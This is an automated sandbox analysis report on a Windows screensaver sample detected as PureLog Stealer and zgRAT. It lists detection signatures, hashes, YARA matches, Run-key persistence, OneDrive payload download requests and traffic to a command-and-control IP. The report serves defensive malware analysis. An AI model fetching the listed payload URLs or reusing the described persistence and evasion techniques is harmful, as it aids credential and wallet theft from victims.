Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Overview

General Information

Sample name:UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Analysis ID:1428798
MD5:f99dc4d2e045ae0bbc169fff12a5c6d5
SHA1:c3a4a89907201776e9ad38fc63573522e0d233f1
SHA256:e4726c4cad6dd043e87289a51733a6627b2abf1ae88b70458c9674ef4669540c
Infos:

Detection

PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • Kbojz.exe (PID: 3552 cmdline: "C:\Users\user\AppData\Roaming\Kbojz.exe" MD5: F99DC4D2E045AE0BBC169FFF12A5C6D5)
    • Kbojz.exe (PID: 3752 cmdline: "C:\Users\user\AppData\Roaming\Kbojz.exe" MD5: F99DC4D2E045AE0BBC169FFF12A5C6D5)
  • Kbojz.exe (PID: 3652 cmdline: "C:\Users\user\AppData\Roaming\Kbojz.exe" MD5: F99DC4D2E045AE0BBC169FFF12A5C6D5)
    • Kbojz.exe (PID: 3840 cmdline: "C:\Users\user\AppData\Roaming\Kbojz.exe" MD5: F99DC4D2E045AE0BBC169FFF12A5C6D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.419873303.0000000000640000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
      00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_zgRATDetects zgRATditekSHen
        • 0x5b65e:$s1: file:///
        • 0x5b56c:$s2: {11111-22222-10009-11112}
        • 0x5b5ee:$s3: {11111-22222-50001-00000}
        • 0x57783:$s4: get_Module
        • 0x57a69:$s5: Reverse
        • 0x4f5a5:$s6: BlockCopy
        • 0x4f57b:$s7: ReadByte
        • 0x5b670:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
        00000002.00000002.424766179.0000000003EDF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 30 entries
          SourceRuleDescriptionAuthorStrings
          3.2.Kbojz.exe.37a86e0.5.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              3.2.Kbojz.exe.37efeb0.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4cf0000.13.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.6010000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    Click to see the 43 entries

                    System Summary

                    barindex
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Kbojz.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, ProcessId: 3224, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Kbojz
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrAvira: detected
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeAvira: detection malicious, Label: HEUR/AGEN.1304549
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeReversingLabs: Detection: 63%
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrReversingLabs: Detection: 63%
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeJoe Sandbox ML: detected
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrJoe Sandbox ML: detected
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49171 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49175 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49178 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49179 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.41.11:443 -> 192.168.2.22:49184 version: TLS 1.2
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: f2f5b5c0-4645-40a2-a057-694e3cbb601b<Module>costura.costura.dll.compressedcostura.dotnetzip.dll.compressedcostura.dotnetzip.pdb.compressedcostura.protobuf-net.dll.compressedDglpobuyba.g.resourcesaR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: costura.dotnetzip.pdb.compressed source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359148679.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.0000000003259000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.000000000386F000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: p costura.dotnetzip.pdb.compressedt- source: Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: p costura.dotnetzip.pdb.compressed source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359148679.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.0000000003259000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.000000000386F000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Dglpobuyba.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003830000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: p costura.dotnetzip.pdb.compressedlB source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434522188.0000000006180000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: p@costura.dotnetzip.pdb.compressed source: Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 4x nop then jmp 01EF7B2Bh0_2_01EF7928
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 4x nop then jmp 01EF7B2Bh0_2_01EF7919
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 4x nop then jmp 01EF8FEFh0_2_01EF9085
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 4x nop then jmp 01EF8FEFh0_2_01EF8F88
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_01F09970
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_01F09978
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_04C8D900
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then jmp 020F8FEFh3_2_020F9085
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then jmp 020F7B2Bh3_2_020F7919
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then jmp 020F7B2Bh3_2_020F7928
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then jmp 020F8FEFh3_2_020F8F88
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_021A917A
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_021A9180
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_052CD900
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then jmp 02018FEFh4_2_02019085
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then jmp 02017B2Bh4_2_02017919
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then jmp 02017B2Bh4_2_02017928
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then jmp 02018FEFh4_2_02018F88
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_0203917B
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_02039180
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_0540D900
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 80.85.152.161:2442
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 150.171.41.11 150.171.41.11
                    Source: Joe Sandbox ViewIP Address: 13.107.137.11 13.107.137.11
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.85.152.161
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: unknownDNS traffic detected: queries for: onedrive.live.com
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060CA000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: Kbojz.exe, 00000006.00000002.478817595.000000000246E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dual-spov-0006.spov-dc-msedge.net
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000244C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dual-spov-0006.spov-msedge.net
